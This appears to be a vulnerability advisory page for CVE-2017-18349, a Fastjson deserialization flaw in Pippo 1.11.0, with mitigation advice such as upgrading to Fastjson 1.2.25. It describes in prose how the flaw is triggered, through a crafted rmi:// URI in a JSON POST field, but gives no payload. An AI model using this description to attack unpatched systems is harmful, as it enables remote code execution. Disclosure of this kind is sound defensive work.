CVE-2017-18349 : Exploit Details and Defense Strategies
Learn about CVE-2017-18349, a Fastjson vulnerability affecting Pippo 1.11.0. Remote attackers can execute arbitrary code via a crafted JSON request. Find mitigation steps and updates here.
Fastjson parseObject function vulnerability in Pippo 1.11.0
Understanding CVE-2017-18349
Fastjson vulnerability impacting Pippo 1.11.0
What is CVE-2017-18349?
The parseObject function in Fastjson, before version 1.2.25, allows remote attackers to execute arbitrary code. This vulnerability affects FastjsonEngine in Pippo 1.11.0 and related products. It can be triggered by a malicious JSON request with a crafted rmi:// URI in the dataSourceName field of an HTTP POST request to the /json URI in Pippo.
The Impact of CVE-2017-18349
- Remote attackers can execute arbitrary code
- Vulnerability mishandled in the AjaxApplication.java file
Technical Details of CVE-2017-18349
Details of the vulnerability in Fastjson and Pippo
Vulnerability Description
- Vulnerability in parseObject function in Fastjson
- Exploitable by remote attackers to execute arbitrary code
Affected Systems and Versions
- Fastjson versions prior to 1.2.25
- Pippo 1.11.0 and related products
Exploitation Mechanism
- Triggered by a malicious JSON request with crafted rmi:// URI in dataSourceName field of HTTP POST to /json URI in Pippo
Mitigation and Prevention
Protecting systems from CVE-2017-18349
Immediate Steps to Take
- Update Fastjson to version 1.2.25 or newer
- Apply patches provided by Pippo to address the vulnerability
Long-Term Security Practices
- Regularly update software and libraries to the latest versions
- Implement input validation mechanisms to prevent malicious JSON requests
- Conduct security audits and penetration testing to identify vulnerabilities
Patching and Updates
- Fastjson version 1.2.25 addresses the vulnerability
- Pippo may release patches to fix the issue